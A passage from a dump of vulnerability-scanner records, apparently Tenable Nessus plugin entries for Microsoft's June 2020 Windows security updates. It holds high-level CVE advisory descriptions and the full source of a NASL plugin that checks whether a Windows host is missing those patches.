objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-1348)\n\n - A remote code execution vulnerability exists when Microsoft Windows OLE fails to properly validate user input. An attacker could exploit the vulnerability to execute malicious code. (CVE-2020-1281)\n\n - An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) IIS module improperly handles uploaded content. An attacker who successfully exploited this vulnerability could upload restricted file types to an IIS-hosted folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1291)\n\n - An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations. (CVE-2020-1302)\n\n - An elevation of privilege vulnerability exists in Windows Text Service Framework (TSF) when the TSF server fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this vulnerability could run arbitrary code in a privileged process. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when the Windows Installer fails to properly sanitize input leading to an insecure library loading behavior. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. The security update addresses the vulnerability by correcting the input sanitization error to preclude unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1315)\n\n - A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. (CVE-2020-1299)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262, CVE-2020-1269)\n\n - A remote code execution vulnerability exists when Microsoft Windows fails to properly handle cabinet files. (CVE-2020-1300)\n\n - A denial of service vulnerability exists when Windows Registry improperly handles filesystem operations. An attacker who successfully exploited the vulnerability could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1213, CVE-2020-1214, CVE-2020-1215, CVE-2020-1216, CVE-2020-1230, CVE-2020-1260)\n\n - A remote code execution vulnerability exists in the way that Microsoft browsers access objects in memory. The vulnerability could corrupt memory in a way that could allow an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1219)\n\n - An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1282, CVE-2020-1334)\n\n - An information disclosure vulnerability exists in the way Windows Error Reporting (WER) handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1263)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1160)\n\n - An elevation of privilege vulnerability exists in the way that the Windows WalletService handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1287)\n\n - A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n (CVE-2020-1301)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when an OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when Group Policy improperly checks access. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1317)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when Windows Modules Installer Service improperly handles class object members. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. The update addresses the vulnerability by correcting how Windows handles calls to preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when Component Object Model (COM) client uses special case IIDs. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251, CVE-2020-1253, CVE-2020-1310)\n\n - A spoofing vulnerability exists when theMicrosoft Edge (Chromium-based) in IE Mode improperly handles specific redirects. An attacker who successfully exploits the IE Mode vulnerability could trick a user into believing that the user was on a legitimate website. The specially crafted website could either spoof content or serve as a pivot to chain an attack with other vulnerabilities in web services. (CVE-2020-1220)", "cvss3": {}, "published": "2020-06-09T00:00:00", "type": "nessus", "title": "KB4561673: Windows 8.1 and Windows Server 2012 R2 June 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0915", "CVE-2020-0916", "CVE-2020-0986", "CVE-2020-1160", "CVE-2020-1194", "CVE-2020-1196", "CVE-2020-1207", "CVE-2020-1208", "CVE-2020-1212", "CVE-2020-1213", "CVE-2020-1214", "CVE-2020-1215", "CVE-2020-1216", "CVE-2020-1219", "CVE-2020-1220", "CVE-2020-1230", "CVE-2020-1231", "CVE-2020-1236", "CVE-2020-1239", "CVE-2020-1246", "CVE-2020-1247", "CVE-2020-1251", "CVE-2020-1253", "CVE-2020-1254", "CVE-2020-1255", "CVE-2020-1260", "CVE-2020-1262", "CVE-2020-1263", "CVE-2020-1269", "CVE-2020-1270", "CVE-2020-1272", "CVE-2020-1281", "CVE-2020-1282", "CVE-2020-1287", "CVE-2020-1291", "CVE-2020-1299", "CVE-2020-1300", "CVE-2020-1301", "CVE-2020-1302", "CVE-2020-1310", "CVE-2020-1311", "CVE-2020-1314", "CVE-2020-1315", "CVE-2020-1317", "CVE-2020-1334", "CVE-2020-1348"], "modified": "2023-03-06T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_JUN_4561666.NASL", "href": "https://www.tenable.com/plugins/nessus/137262", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137262);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/03/06\");\n\n script_cve_id(\n \"CVE-2020-0915\",\n \"CVE-2020-0916\",\n \"CVE-2020-0986\",\n \"CVE-2020-1160\",\n \"CVE-2020-1194\",\n \"CVE-2020-1196\",\n \"CVE-2020-1207\",\n \"CVE-2020-1208\",\n \"CVE-2020-1212\",\n \"CVE-2020-1213\",\n \"CVE-2020-1214\",\n \"CVE-2020-1215\",\n \"CVE-2020-1216\",\n \"CVE-2020-1219\",\n \"CVE-2020-1220\",\n \"CVE-2020-1230\",\n \"CVE-2020-1231\",\n \"CVE-2020-1236\",\n \"CVE-2020-1239\",\n \"CVE-2020-1246\",\n \"CVE-2020-1247\",\n \"CVE-2020-1251\",\n \"CVE-2020-1253\",\n \"CVE-2020-1254\",\n \"CVE-2020-1255\",\n \"CVE-2020-1260\",\n \"CVE-2020-1262\",\n \"CVE-2020-1263\",\n \"CVE-2020-1269\",\n \"CVE-2020-1270\",\n \"CVE-2020-1272\",\n \"CVE-2020-1281\",\n \"CVE-2020-1282\",\n \"CVE-2020-1287\",\n \"CVE-2020-1291\",\n \"CVE-2020-1299\",\n \"CVE-2020-1300\",\n \"CVE-2020-1301\",\n \"CVE-2020-1302\",\n \"CVE-2020-1310\",\n \"CVE-2020-1311\",\n \"CVE-2020-1314\",\n \"CVE-2020-1315\",\n \"CVE-2020-1317\",\n \"CVE-2020-1334\",\n \"CVE-2020-1348\"\n );\n script_xref(name:\"MSKB\", value:\"4561673\");\n script_xref(name:\"MSKB\", value:\"4561666\");\n script_xref(name:\"MSFT\", value:\"MS20-4561673\");\n script_xref(name:\"MSFT\", value:\"MS20-4561666\");\n script_xref(name:\"IAVA\", value:\"2020-A-0247-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0248-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0051\");\n\n script_name(english:\"KB4561673: Windows 8.1 and Windows Server 2012 R2 June 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4561673\nor cumulative update 4561666. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1302)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262,\n CVE-2020-1269)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1282, CVE-2020-1334)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1263)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253, CVE-2020-1310)\n\n - A spoofing vulnerability exists when theMicrosoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2020-1220)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4561673/windows-8-1-kb4561673\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4561666/windows-8-1-kb4561666\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4561673 or Cumulative Update KB4561666.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1299\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1317\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-06';\nkbs = make_list(\n '4561666',\n '4561673'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.3', \n sp:0,\n rollup_date:'06_2020',\n bulletin:bulletin,\n rollup_kb_list:[4561666, 4561673])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:01:53", "description": "The remote Windows host is missing security update 4561649.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-1348)\n\n - An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1282, CVE-2020-1304, CVE-2020-1334)\n\n - A remote code execution vulnerability exists when Microsoft Windows OLE fails to properly validate user input. An attacker could exploit the vulnerability to execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the way Windows Error Reporting (WER) handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1261, CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) IIS module improperly handles uploaded content. An attacker who successfully exploited this vulnerability could upload restricted file types to an IIS-hosted folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists in the way that the wlansvc.dll handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1291)\n\n - An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations. (CVE-2020-1302)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector or the Visual Studio Standard Collector fail to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting manager improperly handles a process crash. An attacker who successfully exploited this vulnerability could delete a targeted file leading to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations. (CVE-2020-1271)\n\n - An elevation of privilege vulnerability exists in Windows Text Service Framework (TSF) when the TSF server fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this vulnerability could run arbitrary code in a privileged process. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when the Windows Installer fails to properly sanitize input leading to an insecure library loading behavior. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. The security update addresses the vulnerability by correcting the input sanitization error to preclude unintended elevation. (CVE-2020-1272)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector Service improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges. An attacker with unprivileged access to a vulnerable system could exploit this vulnerability. The security update addresses the vulnerability by ensuring the Diagnostics Hub Standard Collector Service properly handles file operations. (CVE-2020-1278)\n\n - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1315)\n\n - An elevation of privilege vulnerability exists in the way that the Windows WalletService handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1287, CVE-2020-1294)\n\n - A remote code execution vulnerability exists when Microsoft Windows fails to properly handle cabinet files. (CVE-2020-1300)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1213, CVE-2020-1214, CVE-2020-1215, CVE-2020-1216, CVE-2020-1230, CVE-2020-1260)\n\n - A remote code execution vulnerability exists in the way that Microsoft browsers access objects in memory. The vulnerability could corrupt memory in a way that could allow an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows Registry improperly handles filesystem operations. An attacker who successfully exploited the vulnerability could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1160)\n\n - A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1073)\n\n - An elevation of privilege vulnerability exists when the Windows State Repository Service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows State Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when Windows Host Guardian Service improperly handles hashes recorded and logged. An attacker who successfully exploited the vulnerability could tamper with the log file. In an attack scenario, an attacker can change existing event log types to a type the parsers do not interpret allowing an attacker to append their own hash without triggering an alert. The update addresses the vulnerability by correcting how Windows Host Guardian Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n (CVE-2020-1301)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when an OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when Group Policy improperly checks access. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1317)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262, CVE-2020-1264, CVE-2020-1266, CVE-2020-1269, CVE-2020-1316)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when Windows Modules Installer Service improperly handles class object members. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. The update addresses the vulnerability by correcting how Windows handles calls to preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when Component Object Model (COM) client uses special case IIDs. An attacker who successfully 